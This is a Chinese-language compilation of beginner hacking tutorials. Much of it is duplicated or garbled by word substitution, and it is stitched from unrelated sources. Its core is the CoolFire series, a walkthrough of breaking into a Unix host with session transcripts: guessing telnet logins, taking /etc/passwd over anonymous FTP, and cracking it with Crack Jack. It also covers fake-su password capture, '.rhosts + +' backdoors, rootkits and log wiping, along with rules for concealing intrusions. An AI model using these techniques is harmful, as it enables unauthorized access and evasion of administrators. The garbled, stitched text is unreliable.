coolfire黑客入门教程系列之(一)

黑客技术入门教程黑客技术入门教程黑客技术入门教程第一节、黑客的种类和行为以我的理解，“黑客”大体上应该分为“正”、“邪”两类，正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善，而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情，因为邪派黑客所从事的事情违背了《黑客守则》，所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker)，也就是我们平时经常听说的“黑客”(Cacker)和“红客”(Hacker)。

无论那类黑客，他们最初的学习内容都将是本部分所涉及的内容，而且掌握的基本技能也都是一样的。

即便日后他们各自走上了不同的道路，但是所做的事情也差不多，只不过出发点和目的不一样而已。

很多人曾经问我：“做黑客平时都做什么?是不是非常刺激?”也有人对黑客的理解是“天天做无聊且重复的事情”。

实际上这些又是一个错误的认识，黑客平时需要用大量的时间学习，我不知道这个过程有没有终点，只知道“多多益善”。

由于学习黑客完全出于个人爱好，所以无所谓“无聊”;重复是不可避免的，因为“熟能生巧”，只有经过不断的联系、实践，才可能自己体会出一些只可意会、不可言传的心得。

在学习之余，黑客应该将自己所掌握的知识应用到实际当中，无论是哪种黑客做出来的事情，根本目的无非是在实际中掌握自己所学习的内容。

第二节、黑客应掌握的基本技能从这一节开始，我们就真正踏上学习黑客的道路了，首先要介绍的是作为一名初级黑客所必须掌握的基本技能，学习这可以通过这一节的阅读了解到黑客并不神秘，而且学习起来很容易上手。

为了保证初学者对黑客的兴趣，所以本书采取了循环式进度，也就是说每一章节的内容都是独立、全面的，学习者只有完整的学习过一章的内容，才能够进而学习下一章的内容。

一、了解一定量的英文：学习英文对于黑客来说非常重要，因为现在大多数资料和教程都是英文版本，而且有关黑客的新闻也是从国外过来的，一个漏洞从发现到出现中文介绍，需要大约一个星期的时间，在这段时间内网络管理员就已经有足够的时间修补漏洞了，所以当我们看到中文介绍的时候，这个漏洞可能早就已经不存在了。

最简单的黑客入门教程目录1 黑客简介 (2)2 保护自己电脑绝对不做黑客肉鸡 (2)3 抓肉鸡的几种方法 (5)4 防止黑客通过Explorer侵入系统 (9)5 SQL注入详解 (10)5.1 注入工具 (11)5.2 php+Mysql注入的误区 (11)5.3 简单的例子 (12)5.4 语句构造 (14)5.5 高级应用 (22)5.6 实例 (26)5.7 注入的防范 (29)5.8 我看暴库漏洞原理及规律1 (29)5.9 我看暴库漏洞原理及规律2 (32)6 跨站脚本攻击 (34)6.1 跨站脚本工具 (34)6.2 什么是XSS攻击 (35)6.3 如何寻找XSS漏洞 (35)6.4 寻找跨站漏洞 (36)6.5 如何利用 (36)6.6 XSS与其它技术的结合 (38)7 XPath注入 (38)7.1 XPath注入介绍 (38)7.2 XPath注入工具 (41)声明：文章来源大多是网上收集而来，版权归其原作者所有。

1黑客简介"黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。

关于"黑客"一词的经典定义，最初来源于麻省理工学院关于信息技术的一份文档，之后便被新闻工作者们长期使用。

但是这个在麻省理工被当做中性词汇的术语，却逐渐被新闻工作者们用在了贬义的环境，而很多人也受其影响，最终导致了"黑客"一词总是用于贬义环境。

有些人认为，我们应该接受"黑客"一词已经被用滥并且有了新的意义。

他们认为，如果不认可这种被滥用的词汇，那么将无法与那些不懂技术的人进行有效的交流。

而我仍然认为，将黑客和恶意的骇客(cracker)分开表述，对交流会更有效，比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象，从而能够达到更好的沟通交流效果，也避免了对"黑客"一词的滥用。

从零开始学习黑客技术入门教程(基础)学习黑客技术是一项既有趣又富有挑战性的任务。

它不仅可以帮助你了解网络安全，还可以提高你的计算机技能。

在这个教程中，我们将从基础开始，一步一步地教你如何成为一名黑客。

我们需要了解什么是黑客。

黑客并不是那些在电影中看到的破坏计算机系统的人。

实际上，黑客是指那些使用计算机和网络技术来探索、理解、创新和解决问题的人。

他们可以是网络安全专家、程序员、工程师等等。

1. 编程语言：编程语言是计算机程序的基础。

学习编程语言可以帮助你理解计算机的工作原理，以及如何编写代码来解决问题。

Python是一种非常适合初学者的编程语言，它简单易学，功能强大。

2. 操作系统：操作系统是计算机的核心软件，它管理计算机的硬件和软件资源。

学习操作系统可以帮助你了解计算机是如何工作的，以及如何使用计算机来完成任务。

Linux是一种非常流行的操作系统，它开源、免费，非常适合学习黑客技术。

3. 网络协议：网络协议是计算机之间进行通信的规则。

学习网络协议可以帮助你了解互联网是如何工作的，以及如何保护自己的网络安全。

TCP/IP是互联网中最常用的网络协议。

除了基础知识，你还需要学习一些黑客技术的基本工具和技巧。

这包括如何使用网络扫描工具、如何进行渗透测试、如何编写漏洞利用代码等等。

学习黑客技术需要时间和耐心，但是只要你坚持下去，你一定可以成为一名优秀的黑客。

希望这个教程可以帮助你开始你的学习之旅。

从零开始学习黑客技术入门教程(基础)学习黑客技术是一项既有趣又富有挑战性的任务。

它不仅可以帮助你了解网络安全，还可以提高你的计算机技能。

在这个教程中，我们将从基础开始，一步一步地教你如何成为一名黑客。

我们需要了解什么是黑客。

黑客并不是那些在电影中看到的破坏计算机系统的人。

实际上，黑客是指那些使用计算机和网络技术来探索、理解、创新和解决问题的人。

他们可以是网络安全专家、程序员、工程师等等。

1. 编程语言：编程语言是计算机程序的基础。

黑客入门教程黑客入门教程黑客（Hacker）一词原指精通电脑技术的高手，后来逐渐演化为指掌握计算机系统的安全漏洞并进行攻击的人。

然而，在现实生活中，黑客并不一定都是坏人。

一些安全研究人员也自称为“白帽黑客”，他们致力于发现并修复系统漏洞，提高计算机系统的安全性。

黑客的技能包括计算机编程、系统安全、网络通信等方面的知识。

以下是一个简单的黑客入门教程，帮助初学者理解黑客技术的基本知识和操作步骤。

1. 学习编程语言：作为一个黑客，掌握至少一种编程语言是必要的。

常用的编程语言有Python、C++、Java等。

使用这些语言，你可以更好地了解计算机的工作原理，并编写自己的程序。

2. 了解计算机网络：黑客需要了解计算机网络的基础知识，包括IP地址、端口、HTTP协议、TCP/IP协议等。

这些知识将帮助你更好地理解网络通信过程，并进行网络攻击或安全防护。

3. 学习操作系统：操作系统是黑客攻击的目标之一，也是黑客进行攻击或保护的平台。

学习操作系统，比如Windows、Linux等，可以帮助你理解系统的工作原理，并发现系统漏洞。

4. 学习网络安全：网络安全是黑客技能的核心。

学习网络安全知识，包括密码学、防护机制、入侵检测等，将帮助你提高系统的安全性，并防范他人的黑客攻击。

5. 使用合法的渠道学习：黑客技术涉及到很多法律、道德和道义问题。

为了避免违法行为，你应该使用合法的渠道学习黑客技术，比如阅读相关书籍、参加网络安全培训班等。

6. 实践并分享经验：实践是掌握黑客技术的最好方式。

你可以自己创建一个安全测试环境，模拟攻击和防御的场景，并通过实践来提升自己的技能。

同时，你也可以与其他黑客交流和分享经验，从中获取更多的知识。

总之，要成为一名合格的黑客，需要全面掌握计算机技术、网络安全和编程等方面的知识。

同时，要始终保持道德和法律意识，遵守法律规定，将技术用于正当的目的，为保护网络安全做出贡献。

coolfire黑客入门教程系列之（一）这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !!#1 甚麽是 Hacking ?就是入侵电脑! 有甚麽好解释的! 大部份有关介绍Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了,最好不要成为一个 "骇客", 我... 不是!#2 为甚麽要 Hack ?我们只是为了要了解更多关於系统的技术, 入侵它, 了解它是如何运作的, 试试它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作 !! 为了安全性而作革命!#3 Hack 守则1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料 !!2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状.3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友.4. 不要在 bbs 上谈论你 Hack 的任何事情.5. 在 Post 文章的时候不要使用真名.6. 正在入侵的时候, 不要随意离开你的电脑.7. 不要侵入或破坏政府机关的主机.8. 不在电话中谈论你 Hack 的任何事情.9. 将你的笔记放在安全的地方.10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞的文件 (英文快点学好)!11. 已侵入电脑中的帐号不得清除或修改.12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !!13. 不将你已破解的帐号分享与你的朋友.#4 破解之道1. 进入主机中2. 得到 /etc/passwd3. 得到系统帐号4. 得到最高权限-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-How 1.进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些 Port 都是很好的进行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麽??? 我不知道, 你知道吗?!底下的示范并不是像写出来的那麽容易, 只不过是要让你了解如何进入,当然其中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了面子.... 一定要删掉这些不堪入目的东西嘛...示范进入主机的方法: (By CoolFire)(首先要先连上某一台你已经有帐号的Telnet 主机, 当然最好是假的, 也就是 Crack过的主机, 然後利用它来 Crack 别的主机, 才不会被别人以逆流法查出你的所在)Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0(我用的是 ... 当然是假的罗, 都已经经过修改了啦 !!没有这一台主机啦 !! 别怕 ! 别怕 ! 以下的主机名称都是假的名称, 请同学们要记得 !!)Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是......)> telnet (Telnet 试试看....)Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrect(没关系, 再来 !!)cool login: hinetPassword:Login incorrectcool login:(都没猜对, 这边用的是猜的方法, 今天运气好像不好)telnet> closeConnection closed.(重来, 换个 Port 试试看 !!)> telnet 111.222.255.255 80Trying 111.222.255.255...Connected to 111.222.255.255.Escape character is '^]'.<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>Error 400</H1>Invalid request "" (unknown method)<P><HR><ADDRESS><A HREF="">CERN-HTTPD 3.0A</A></ADDRESS></BODY></HTML>Connection closed by foreign host.(哇哩 !! 连密码都没得输入, 真是..... 再来 !! 要有恒心 !!) (换 FTP Port 试试)> ftp 111.222.255.255Connected to 111.222.255.255.220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (111.222.255.255:FakeName): anonymous331 Guest login ok, send your complete e-mail address as password. Password:230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@230-If you do have problems, please try using a dash (-) as the first character230-of your password -- this will turn off the continuation messages that may 230-be confusing your ftp client.230-230 Guest login ok, access restrictions apply.Remote system type is UNIX.Using binary mode to transfer files.(哇 ! 可以用 anonymous 进来耶!! password 部份输入 aaa@ 就好了 !不要留下足迹喔!!)ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.etcpubusrbinlibincomingwelcome.msg226 Transfer complete.(嗯嗯... 太好了 ! 进来了 !! 下一个目标是.....)ftp> cd etc250 CWD command successful.ftp> get passwd (抓回来 !!)200 PORT command successful.150 Opening BINARY mode data connection for passwd (566 bytes).226 Transfer complete.566 bytes received in 0.56 seconds (0.93 Kbytes/s)(喔... 这麽容易吗??)ftp> !cat passwd (看看 !!!)root::0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uucp:/var/spool/uucp:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash ftp:*:404:1::/home/ftp:/bin/bash(哇哩... 是 Shadow 的... 真是出师不利.... )ftp> bye221 Goodbye.(不信邪.... 还是老话, 要有恒心....)(FTP 不行, 再 Telnet 看看 !!)> telnet Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrect(又猜错 !!)cool login: fuckyouPassword:Last login: Mon Dec 2 09:20:07 from 205.11.122.12Linux 1.2.13.Some programming languages manage to absorb change but withstand progress.cool:~$(哇哈哈 !! 哪个笨 root, 用 system name 作 username 连password 也是 system name.... 总算... 没白玩...)cool:~$ systembash: system: command not found(嗯... 这个 user 的权限好像不大....)cool:~$ lscool:~$ pwd/home/fuckyoucool:~$ cd /cool:/$ lsPublic/ cdrom/ lib/ mnt/ tmp/ www/README dev/ linux* proc/ usr/bin/ etc/ local/ root/ var/ 网管网boot/ home/ lost+found/ sbin/cool:/$ cd etctelnet> quit(好想睡呀 !! 不玩了 !! 下节课再开始....)Connection closed.> exit(走了 !! 下节课在见啦 !! 今天就上到这里 ! 老师要先下班了 !!)(有学生说: 骗人! 还没有破解呀!! 胡说 ! 不是已经进来了吗 ???看看这节课上的是甚麽??? ---->进入主机 !! 嗯.....)-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-How 2.上节课抓回来一个"乱七八糟" 的/etc/passwd, 你以为我的真那麽笨吗??guest 所抓回来的能是甚麽好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已经 "猜" 到了一个不是 guest 的 username 及 password. 今天就以它来进入主机瞧瞧!!Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)网管网bitsCN_com(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是.....呵...)> telnet (Telnet 试试看.... 昨天的位址,有作笔记吧!)> telnet Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrectcool login: fuckyouPassword: (一样输入 fuckyou)Last login: Mon Dec 1 12:44:10 from Linux 1.2.13.cool:~$ cd /etccool:/etc$ lsDIR_COLORS ftpusers localtime resolv.conf HOSTNAME gateways magic rpcNETWORKING group mail.rc securettyNNTP_INEWS_DOMAIN host.conf motd sendmail.cf X11@ hosts messages/ sendmail.stXF86Config hosts.allow mtab servicesat.deny hosts.deny mtools shellsbootptab hosts.equiv named.boot shutdownpcsh.cshrc hosts.lpd networks snoopy/csh.login httpd.conf nntpserver slip.hostsexports inetd.conf passwd snooptabfastboot inittab passwd.OLD syslog.conffdprm issue passwd.old syslog.pidfstab ld.so.cache printcap ttysftpaccess ld.so.conf profile utmp@(找寻目标..... 太乱了 ! 懒得找, 再来 ....)cool:/etc$ ls pa*passwd passwd.OLD passwd.old(果然在)cool:/etc$ more passwd(看看有没有 Shadow...)root:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john (正点 ! 一点都没有防备 !!)cool:/etc$ exitlogout(走了!.... 换 FTP 上场 !!)Connection closed by foreign host.> ftp Connected to .220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (:66126): fuckyou331 Password required for fuckyou.Password:230 User fuckyou logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd /etc250 CWD command successful.ftp> get passwd200 PORT command successful. 150 Opening BINARY mode data connection for passwd (350 bytes).226 Transfer complete.350 bytes received in 0.68 seconds (1.9 Kbytes/s)ftp> !cat passwdroot:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(看看 ! 呵 ! 假不了 !!......)ftp> bye221 Goodbye.> exit(闪人罗 !! 下课 !!.... 喔慢点, 还有事要说明......)passwd 的 Shadow 就是把 passwd 放在 shadow 档中, 而你原先在第一节课所看到的这个格式的 passwd 并不是真正的 passwd....root::0:0:root:/root:/bin/bash因为密码的部份没有东西.... 所以拿了也没有用!! 但这一节课所拿到的东西呢,像是这样, 有几点需要说明的, 就是它究竟代表著甚麽???john:234ab56:9999:13:John Smith:/home/john:/bin/sh它以 ":" 分成几个栏位, 各栏位对照如下:User Name: johnPassword:234ab56User No: 9999Group No: 13Real Name: John SmithHome Dir: /home/johnShell: /bin/sh了了吧 ! 了了吧 ! 保留著你千辛万苦所拿到的 passwd, 咱们第三节网管网bitsCN_com课再来告诉各位如何使用 Crack Jack 把 passwd 解码.... 呵呵... zzZZzZzz...-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-Crack Jack V1.4 中文使用说明 (By CoolFire 12-1-1996)嗯... 该到第三课了 !! 累了的同学先去喝口水吧!这一节课咱们来说说 Crack Jack ! 这可是个解读 /etc/passwd 的好工具喔,不要告诉我你习惯用Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包准你马上投向 Crack Jack 1.4的怀抱, 但请先确定你所使用的是Crack Jack 1.4, 你可以在CoolFire 的Hacker&Mailer Page中拿到这个版本的 Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上 !但还是要讲讲它的缺点... 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上开个DOS Mode 跑,它可是连理都不会理你的 !OK! 现在切入正题 ! etc/passwd 拿到手了吧 !! 开始罗 !! 使用 Crack Jack 1.4前所需要的东西有这些 [1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在 Unix系统中的 /etc/ 目录中找到 passwd [3] 字典档 (哪里找, 自己敲... 呵 ClayMore 中有一份中国网管联盟www_bitscn_comDIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn!1.0 里面也有, 听James说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用 Crack Jack 1.4前需先确定你所使用的机器是 386 含以上 CPU 的 ! 然後最好有充足的记忆体 !!开始Jack 时只要敲入JACK 即可, 它会问你PW Name... 输入你的passwd 档名,DictionaryName 输入你的字典档名, Jack 就会开始找了 ! 找到时会告诉你, 也会在JACK.POT中写入它所找到的密码 !! 但... 有点怪的格式! 如果找到的是具 root 权限的密码, Jack 会告诉你This isJackAss... 嗯...说脏话了 !! 因为使用 Jack 占用的时间实在太多,如果你中途想要停掉时只要按下 Ctrl-C 即可, 别以为你前功尽弃了! 因为 Jack 有个 Restore 的功能,中断时会自动存档为RESTORE, 下次要继续这次的寻找只要输入Jack -Restore:RESTORE 即可 !!当然你也可以为你的 Restore 重新命名 ! Jack 也会找得到的 ... 如 Ren restore restore.HNT 之後要再寻找的时後就 Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的 Restore 前次所寻找的字串...网管网bitsCN_com继续帮你找下去....字典档哪里找: 我的不给你! 可以找别的 Brute Force 之类的程式, 有些里面会附,或是找找其它的Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来,可能要有一点资料栏位及写程式的基础.[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的root 权限密码 ! Jack好正点呀 !!!所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧!!------最近比较没空了! 因为要赶其它的报告, Home Page 也没有太多时间整理,更别说是写这些说明了,但是太多网友需要, 我只好两肋插刀... 差点昨天就交不出报告了 !!如果你有兴趣写其它程式的中文说明, 请完成後寄一份给我, 我将它放在Home Page 上面让其它人参考,当然你也可以给我你的使用心得, 让别人参考看看也行! 另外CoolFire 目前准备收集一系列的System HoleList, 如果你在其它的站台有看到的, 请把它先 Cut 下来, Mail 一份给我 !这样我才能弄出一份更齐全的东西呀.... 还有... 在想弄个 Mail List... 唉.. 不想这麽多了! 有空再说吧! ------再次重申, Crack 别人站台之後不要破坏别人站台中的资料, 此篇文章仅作为教育目的,不主张你随便入侵他人主机.... (当然高-Net 除外, 我恨死它了)... 请勿将这类技术使用於破坏上(又.....如果第三次世界大战开打, 你可以任意破坏敌国的电脑网路... 我全力支持),最严重的情况(如果你真的很讨厌该主机的话)... 就将它 Shut Down.... 好了! 别太暴力了!【转自】。

当然大多半进击成功的典范照样应用了体系软件本身的破绽.造成软件破绽的重要原因在于编制该软件的程序员缺乏安然意识.当进击者对软件进行非正常的挪用要求时造成缓冲区溢出或者对文件的不法拜访.个中应用缓冲区溢出进行的进击最为广泛,据统计80％以上成功的进击都是应用了缓冲区溢出破绽来获得不法权限的.关于缓冲区溢出在后面用专门章节来作具体说明.无论作为一个黑客照样一个收集治理员,都须要控制尽量多的体系破绽.黑客须要用它来完成进击,而治理员须要依据不合的破绽来进行不合的防御措施.懂得最新最多的破绽信息,可以到诸如Rootshell（www.rootshell．com）.Packetstorm （packetstorm．securify．com）.Securityfocus （www.securityfocus．com）等网站去查找.2.权限的扩大体系破绽分为长途破绽和当地破绽两种,长途破绽是指黑客可以在此外机械上直接应用该破绽进行进击并获取必定的权限.这种破绽的威逼性相当大,黑客的进击一般都是从长途漏敞开端的.但是应用长途破绽获取的不必定是最高权限,而往往只是一个通俗用户的权限,如许经常没有办法做黑客们想要做的事.这时就须要合营当地破绽来把获得的权限进行扩大,经常是扩大至体系的治理员权限.只有获得了最高的治理员权限之后,才可以做诸如收集监听.打扫陈迹之类的工作.要完成权限的扩大,不单可以应用已获得的权限在体系上履行应用当地破绽的程序,还可以放一些木马之类的诱骗程序来套取治理员暗码,这种木马是放在当地套取最高权限用的,而不克不及进行长途控制.例如一个黑客已经在一台机械上获得了一个通俗用户的账号和登录权限,那么他就可以在这台机械上放置一个假的su程序.一旦黑客放置了假su程序,当真正的正当用户登录时,运行了su,并输入了暗码,这时root暗码就会被记载下来,下次黑客再登录时就可以应用su变成root了.进击的善后工作1.日记体系简介假如进击者完成进击后就连忙分开体系而不做任何善后工作,那么他的行踪将很快被体系治理员发明,因为所有的收集操纵系同一般都供给日记记载功效,会把体系上产生的动作记载下来.所以,为了自身的隐蔽性,黑客一般都邑抹失落本身在日记中留下的陈迹.想要懂得黑客抹失落陈迹的办法,起首要懂得罕有的操纵体系的日记构造以及工作方法.Unix的日记文件平日放鄙人面这几个地位,依据操纵体系的不合略有变更／usr／adm——早期版本的Unix.／Var／adm新一点的版本应用这个地位.／Varflort一些版本的Solaris. Linux BSD. Free BSD应用这个地位.／etc,大多半Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog．conf的地位.下面的文件可能会依据你地点的目次不合而不合：acct或pacct－一记载每个用户应用的敕令记载.accesslog重要用来办事器运行了NCSA HTTP办事器,这个记载文件会记载有什么站点衔接过你的办事器.aculo保管拨出去的Modems记载.lastlog记载了比来的Login记载和每个用户的最初目标地,有时是最后不成功Login的记载.loginlog一记载一些不正常的L0gin记载.messages——记载输出到体系控制台的记载,别的的信息由Syslog来生成security记载一些应用 UUCP体系妄图进入限制规模的事例.sulog记载应用su敕令的记载.utmp记载当前登录到体系中的所有效户,这个文件陪同着用户进入和分开体系而不竭变更.Utmpx,utmp的扩大.wtmp记载用户登录和退出事宜.Syslog最重要的日记文件,应用syslogd守护程序来获得.2.隐蔽踪影进击者在获得体系最高治理员权限之后就可以随便修正体系上的文件了（只对通例 Unix体系而言）,包含日记文件,所以一般黑客想要隐蔽本身的踪影的话,就会对日记进行修正.最简略的办法当然就是删除日记文件了,但如许做固然防止了体系治理员依据IP追踪到本身,但也明白无误地告知了治理员,体系己经被人侵了.所以最经常应用的办法是只对日记文件中有关本身的那一部分做修正.关于修正办法的具体细节依据不合的操纵体系有所差别,收集上有很多此类功效的程序,例如 zap. wipe等,其重要做法就是消除 stlog和 Pacct等日记文件中某一用户的信息,使得当应用st等敕令检讨日记文件时,隐蔽失落此用户的信息.治理员想要防止日记体系被黑客修正,应当采纳必定的措施,例如用打印机及时记载收集日记信息.但如许做也有弊病,黑客一旦懂得到你的做法就会不断地向日记里写入无用的信息,使得打印机不断地打印日记,直到所有的纸用光为止.所以比较好的防止日记被修正的办法是把所有日记文件发送到一台比较安然的主机上,即应用loghost.即使是如许也不克不及完整防止日记被修正的可能性,因为黑客既然能攻入这台主机,也很可能攻入loghost.只修正日记是不敷的,因为百密必有一漏,即使自以为修正了所有的日记,仍然会留下一些蛛丝马迹的.例如装配了某些后门程序,运行后也可能被治理员发明.所以,黑客高手可以经由过程调换一些体系程序的办法来进一步隐蔽踪影.这种用来调换正常体系程序的黑客程序叫做rootkit,这类程序在一些黑客网站可以找到,比较罕有的有LinuxRootKit,如今已经成长到了5.0版本了.它可以调换体系的stat.inetd等等一系列重要的体系程序,当调换了ls后,就可以隐蔽指定的文件,使得治理员在应用ls敕令时无法看到这些文件,从而达到隐蔽本身的目标.3.后门一般黑客都邑在攻入体系后不只一次地进入该体系.为了下次再进入体系时便利一点,黑客会留下一个后门,特洛伊木马就是后门的最好典范.Unix中留后门的办法有很多种,下面介绍几种罕有的后门,供收集治理员参考防备.<1>暗码破解后门这是入侵者应用的最早也是最老的办法,它不但可以获得对Unix机械的拜访,并且可以经由过程破解暗码制作后门.这就是破解口令单薄的帐号.今后即使治理员封了入侵者的当前帐号,这些新的帐号仍然可能是从新侵入的后门.多半情形下,入侵者查找口令单薄的未应用帐号,然后将口令改的难些.当治理员查找口令单薄的帐号是,也不会发明这些暗码已修正的帐号.因而治理员很难肯定查封哪个帐号.<2>Rhosts + + 后门在连网的Unix机械中,象Rsh和Rlogin如许的办事是基于rhosts文件里的主机名应用简单的认证办法.用户可以随便马虎的转变设置而不需口令就能进入. 入侵者只要向可以拜访的某用户的rhosts文件中输入"+ +",就可以许可任何人从任何地方无须口令便能进入这个帐号.特殊当home目次经由过程NFS向外共享时,入侵者更热中于此.这些帐号也成了入侵者再次侵入的后门.很多人更爱好应用Rsh,因为它平日缺乏日记才能. 很多治理员经常检讨 "+ +",所以入侵者现实上多设置来自网上的另一个帐号的主机名和用户名,从而不轻易被发明.<3>校验和及时光戳后门早期,很多入侵者用本身的trojan程序替代二进制文件.体系治理员便依附时光戳和系统校验和的程序分辩一个二进制文件是否已被转变,如Unix里的sum程序.入侵者又成长了使trojan文件和原文件时光戳同步的新技巧.它是如许实现的: 先将体系时钟拨回到原文件时光,然后调剂trojan文件的时光为体系时光.一旦二进制trojan文件与本来的准确同步,就可以把体系时光设回当前时光.Sum程序是基于CRC校验,很轻易骗过.入侵者设计出了可以将trojan的校验和调剂到原文件的校验和的程序.MD5是被大多半人推举的,MD5应用的算法今朝还没人能骗过.。

当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。

造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。

当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。

其中利用缓冲区溢出进行的攻击最为普遍，据统计80％以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。

关于缓冲区溢出在后面用专门章节来作详细解释。

无论作为一个黑客还是一个网络管理员，都需要掌握尽量多的系统漏洞。

黑客需要用它来完成攻击，而管理员需要根据不同的漏洞来进行不同的防御措施。

了解最新最多的漏洞信息，可以到诸如Rootshell（www.rootshell．com）、Packetstorm（packetstorm．securify．com）、Securityfocus（www.securityfocus．com）等网站去查找。

2.权限的扩大系统漏洞分为远程漏洞和本地漏洞两种，远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。

这种漏洞的威胁性相当大，黑客的攻击一般都是从远程漏洞开始的。

但是利用远程漏洞获取的不一定是最高权限，而往往只是一个普通用户的权限，这样常常没有办法做黑客们想要做的事。

这时就需要配合本地漏洞来把获得的权限进行扩大，常常是扩大至系统的管理员权限。

只有获得了最高的管理员权限之后，才可以做诸如网络监听、打扫痕迹之类的事情。

要完成权限的扩大，不但可以利用已获得的权限在系统上执行利用本地漏洞的程序，还可以放一些木马之类的欺骗程序来套取管理员密码，这种木马是放在本地套取最高权限用的，而不能进行远程控制。

例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限，那么他就可以在这台机器上放置一个假的su程序。

一旦黑客放置了假su程序，当真正的合法用户登录时，运行了su，并输入了密码，这时root密码就会被记录下来，下次黑客再登录时就可以使用su变成root了。

攻击的善后工作1.日志系统简介如果攻击者完成攻击后就立刻离开系统而不做任何善后工作，那么他的行踪将很快被系统管理员发现，因为所有的网络操作系统一般都提供日志记录功能，会把系统上发生的动作记录下来。

